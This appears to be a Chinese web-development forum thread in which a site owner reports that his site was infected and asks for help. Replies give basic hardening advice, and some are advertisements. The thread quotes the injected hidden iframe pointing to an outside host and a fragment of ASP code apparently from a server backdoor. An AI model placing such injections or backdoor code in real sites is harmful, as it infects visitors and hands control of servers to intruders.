我的网站被挂马了

make6b 2007-03-26 04:23:55
我的网站被挂马了,挂马是一个网站链接
<iframe width=0 height=0 src="http://www.37game.net/css/index.htm">
郁闷呀删除了又来。
不知道怎么解决

请高手帮忙提点意见

小弟感激不进
...全文
487 28 打赏 收藏 转发到动态 举报
写回复
用AI写文章
28 条回复
切换为时间正序
请发表友善的回复…
发表回复
阿辉9090 2010-06-18
  • 打赏
  • 举报
回复
你拿自己的当实验一下就行了
sqqdapsyga 2010-06-18
  • 打赏
  • 举报
回复
有什么好的软件可以检测网站漏洞呢?
髙興~ 2010-06-18
  • 打赏
  • 举报
回复
在服务器上设置文件夹和文件的权限,把数据库和图片文件夹等需要写的,给上写权限,其他的都是只读的。

除非他把服务器的权限拿到了,那样的话服务器上的所有的网站都得中招。

看看图片文件夹,是不是有什么.asp文件的,干掉它。
黑客一般是通过上传漏洞把病毒文件传上去,之后修改其他文件,如果只读就改不了了。
行间 2010-06-18
  • 打赏
  • 举报
回复
只能靠自己。
Alfred_zhong 2010-06-18
  • 打赏
  • 举报
回复
不懂,帮顶楼主
「已注销」 2010-06-18
  • 打赏
  • 举报
回复
看看自己的FTP是否沦陷了!呵呵!
zhaochanglong 2010-06-18
  • 打赏
  • 举报
回复
新手。。 不会
zuoshouaini 2010-06-17
  • 打赏
  • 举报
回复
up! 准备杀马吧
alenk 2010-06-17
  • 打赏
  • 举报
回复
学习一下。
chen_bruce 2010-06-17
  • 打赏
  • 举报
回复
是不是被添加了后门文件啊
「已注销」 2010-06-17
  • 打赏
  • 举报
回复
有自动挂马的脚本!你可以找一下网站的一些asp文件,看是否其他文件里是否包含了一些而已的asp文件!
wqkjj 2010-06-16
  • 打赏
  • 举报
回复
路过,每天回帖即可获得10分可用分!
aemyang1987 2010-06-16
  • 打赏
  • 举报
回复
关注!!!!!!!!!!
njhyl 2010-06-16
  • 打赏
  • 举报
回复
没有上传功能。你的网站是怎么上去的。不解。还有没有上传功能,人家怎么挂马呢。也是不解。
swuboy 2010-06-16
  • 打赏
  • 举报
回复
好强大啊。。。
gmlwl 2010-06-16
  • 打赏
  • 举报
回复
没有上传,就找一找注入漏洞。
fy0000 2010-06-16
  • 打赏
  • 举报
回复
帮顶一下。
mawenlongwww 2010-06-15
  • 打赏
  • 举报
回复
着属于网站定时挂马 几乎是没隔多久就会自动挂马
网站程序上是有漏洞的 如果有需要建议可以去找Sine安全去解决
yunfeng20 2010-06-12
  • 打赏
  • 举报
回复
一下子那么多站被挂马,楼上的广告真的非常及时! 其实这些自己弄一下就可以了.主要是把漏洞补上,然后再把后门文件找出来,删除.大概就可以了!具体操作可以参考http://www.yunfengshop.net/Topics/138.html
make6b 2007-03-27
  • 打赏
  • 举报
回复

Dim theAct, sTime, aspPath, PageName, strBackDoor, fsoX, saX, wsX

sTime = Timer
theAct= Request("theAct")
PageName = Request("PageName")
aspPath=Replace(Server.MapPath(".")&"\~fuck.tmp","\\","\")


加载更多回复(7)

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧